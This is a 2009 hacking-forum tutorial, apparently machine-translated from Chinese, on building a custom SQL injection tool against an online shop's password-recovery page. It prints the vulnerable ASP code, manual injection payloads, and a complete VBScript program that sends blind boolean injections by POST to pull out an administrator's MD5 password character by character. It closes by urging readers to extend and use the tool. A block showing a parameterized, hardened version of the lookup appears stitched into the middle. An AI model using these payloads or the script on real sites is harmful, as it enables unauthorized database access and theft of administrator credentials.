How to build your own injection tool for attacking websites - Vulnerability alert - Black Bar Security Net (myhack58)

2009-09-04T00:00:00
ID MYHACK58:62200924532
Type myhack58
Reporter 佚名
Modified 2009-09-04T00:00:00

Description

Usually, when we run into a website with an injection vulnerability, most people reach for an injection tool such as NBSI or Ah D. But on some sites the injection point is very hard to construct, or the injection statement is unusual. Injecting by hand is time-consuming and tedious, while writing your own targeted tool is a painful thing for friends who are just getting started or who cannot program. So today NP brings you an article on how to use a simple VBS script to build our own targeted injection tool.

Before you read on, I will boldly assume that you already know basic VBS scripting and basic SQL injection.

First, let's look at the vulnerable code. (This fragment is taken from Getpwd2.asp of the "Network Fun online shopping system, Fashion Edition v3.2".)

BTW: this vulnerability was first discovered and tested by a friend, Trace. Thanks!

<!--#include file="conn.asp"-->
<!--#include file="config.asp"-->
<%
username=request.form("username")
set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from [user] where username='"&username&"'"
rs.open sql,conn,1,1
If rs.eof Then
%>

It is known that the administrator table is admin and the password column is password.

Experienced friends will see at once that the SQL statement on the 6th line passes the username variable straight into execution without any filtering. This is a very classic SQL injection vulnerability. So how do we exploit it?

Because the username variable is read with request.form, and request.form only accepts data submitted by POST, we cannot inject by constructing the usual statement:

http://127.0.0.1/getpwd2.asp?username=' or 0<>(select count(*) from admin) and '='

//Typing this directly into the browser address bar submits the data by GET, so Getpwd2.asp does not receive it.

Seeing this, you might say: what about using NBSI's POST submit function?

Testing shows that if you enter http://127.0.0.1/getpwd2.asp?username= in NBSI's address bar and submit by POST, NBSI reports "injection cracking failed".

Because of the shape of the statement, NBSI cannot run the password out for us. Ah D goes without saying: it is GET-only... so it cannot complete the task either.

Now let's test a manual injection!

Fill the following statement into the getpwd2.asp form:

' or 0<>(select count(*) from admin) and '='

The page returns the "correct" prompt, which shows that our injection succeeded!
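For contrast, here is the same Getpwd2.asp lookup with the username bound as a query parameter instead of spliced into the SQL text, so the ' or 0<>(...) and '=' payload above is compared as a literal username rather than executed. This is an added example and not code from the shop system; it assumes that conn from conn.asp is an open ADODB.Connection and that the username column is declared varchar(50) or shorter.

```vbscript
<!--#include file="conn.asp"-->
<!--#include file="config.asp"-->
<%
' Hardened Getpwd2.asp lookup (added example, not the shop system's own code).
' Assumption: conn (from conn.asp) is an open ADODB.Connection; username is varchar(50).
Dim username, cmd, rs
username = Request.Form("username")

' Bound the input before it reaches the database at all.
If Len(username) = 0 Or Len(username) > 50 Then
    Response.Write "Invalid username"
    Response.End
End If

' Parameterized query: the ? placeholder is filled in by the OLE DB provider,
' so a quote character in the input is data, never SQL syntax. 1 = adCmdText.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1
cmd.CommandText = "select * from [user] where username = ?"
' 200 = adVarChar, 1 = adParamInput, 50 = declared column size
cmd.Parameters.Append cmd.CreateParameter("username", 200, 1, 50, username)
Set rs = cmd.Execute

If rs.EOF Then
    ' Same message as the original page, but it now depends only on whether the
    ' literal username exists, not on an attacker-controlled boolean condition.
    Response.Write "this user is not registered"
Else
    ' ... continue with the normal password-retrieval flow ...
End If

rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

The response still differs for existing and non-existing usernames, so user enumeration remains possible; that is a separate issue from the injection, which the bound parameter removes.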

OK, the environment has been analyzed. Let's get to the topic.

The VBS injection script needs the XmlHttp component and the ADODB.Stream component; please make sure both exist on your machine. (They ship with the system by default, but since the ADODB.Stream web Trojan incidents the ADODB.Stream component has been removed from many machines, so make sure the components are usable before writing the injection script.)

On Error Resume Next

If (LCase(Right(WScript.FullName, 11)) = "wscript.exe") Then
    WScript.Echo "Execute it under the cmd.exe Plz! Thx."
    WScript.Quit
End If
'// The IF statement above checks whether the script host is wscript.exe; if so, it tells the user to run the script under CMD (cscript) instead.

url = LCase(Trim(WScript.Arguments(0)))
'// Simple filtering: trim the blanks on both sides of the submitted argument and convert it to lowercase.

RightW = "this user is not registered"
'// This defines the keyword used to judge whether a guess is right or wrong.

If url <> "" Then
    'Guess the administrator table
    data = "'+or+0<>(select+count(*)+from+admin)+and+'='"
    GetHTTPPage(url)
    If Len(GetHTTPPage(url)) < 5 Then
        WScript.Echo "Error...Please checking the url!"
        WScript.Quit
    End If
    '// The IF statement above checks the feedback: if the response is shorter than 5 characters, the submitted URL has a problem, so exit, re-check it and inject again.

    If InStr(GetHTTPPage(url), RightW) = 0 Then
        WScript.Echo "Table name ""admin"" find"
    Else
        WScript.Echo "Not found table name ...the exit..."
        WScript.Quit
    End If
    '// If the keyword check passes, the table-name guess is reported correct; otherwise quit!

    'Guess the password field
    data = "'+or+0<>(select+count(password)+from+admin)+and+'='"
    GetHTTPPage(url)
    If InStr(GetHTTPPage(url), RightW) = 0 Then
        WScript.Echo ""
        WScript.Echo "The Column name ""password"" find"
    Else
        WScript.Echo "Not found Column name ...the exit..."
        WScript.Quit
    End If
    '// Guessing the password field works the same way!

    'Guess the password
    WScript.Echo ""
    WScript.Echo "Start guessing,Waiting... ..."
    WScript.Echo ""
    pwd = ""
    strings = "0123456789abcdef" 'define the password character range: the characters that make up an MD5 value
    For i = 1 To 16 Step 1
        WScript.Echo "Guessing No. " & i & "... ..."
        For k = 1 To Len(strings) Step 1
            data = "'+or+(select+asc(mid(password," & i & ",1))+from+admin+where+adminid=4)=asc(""" & Mid(strings, k, 1) & """)+and+'='"
            GetHTTPPage(url)
            If InStr(GetHTTPPage(url), RightW) = 0 Then
                pwd = pwd & Mid(strings, k, 1)
                Exit For
            End If
        Next
    Next
    '// This is the essence of the script: nested loops guess the password!
    '// The 16 characters of the configured MD5 password are compared one by one, by ASC value, against the character range
    '// When a character matches it is appended to pwd and the inner loop exits, continuing with the next position

    WScript.Echo "--------------------------------------------------------------------------------"
    WScript.Echo "Guessing over!!!"
    If Err.Number <> 0 Then
        WScript.Echo "error:" & Err.Description
        Err.Clear
    Else
        WScript.Echo "Password is:" & pwd
    End If
    '// Output the successfully guessed password
Else
    WScript.Echo "--------------------------------------------------------------------------------"
    WScript.Echo "e.g cscript getpass.vbs http://127.0.0.1/getpwd2.asp"
    WScript.Echo "--------------------------------------------------------------------------------"
End If

'// Below is the POST submit function used for the injection
'// ADODB.Stream converts the encoding; it is faster, and has advantages when comparing the feedback data of many sites!
Function GetHTTPPage(url)
    Dim XmlHttp
    Set XmlHttp = CreateObject("Msxml2.XMLHTTP")
    XmlHttp.open "POST", url, False
    XmlHttp.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    XmlHttp.send "username=" & data
    If XmlHttp.readyState <> 4 Then Exit Function
    GetHTTPPage = Bytes2bStr(XmlHttp.responseBody)
    Set XmlHttp = Nothing
    If Err.Number <> 0 Then Err.Clear
End Function

Function Bytes2bStr(vin)
    Dim BytesStream, StringReturn
    Set BytesStream = CreateObject("ADODB.Stream")
    BytesStream.Type = 2
    BytesStream.Open
    BytesStream.WriteText vin
    BytesStream.Position = 0
    BytesStream.Charset = "GB2312"
    BytesStream.Position = 2
    StringReturn = BytesStream.ReadText
    BytesStream.Close
    Set BytesStream = Nothing
    Bytes2bStr = StringReturn
End Function

Note: the spaces in the submitted SQL statement need to be replaced with plus signs, otherwise the guessing fails on some machines!

The above is our self-built, targeted injection tool.

Usage is also very simple; under CMD run:

cscript getpass.vbs http://127.0.0.1/getpwd2.asp and you are done!

Isn't that simple?

You might also ask: why not guess the administrator username field and the associated ID? Well, that is a big job left for you.

You can add the following functions:

Automatically determine the administrator's username field

Automatically determine the valid ID values for the administrator's username

Guess a specified ID

Deeper filtering and detection of whether the URL is valid

Enough talk... action is what counts! Go Go Go... start building your own injection program.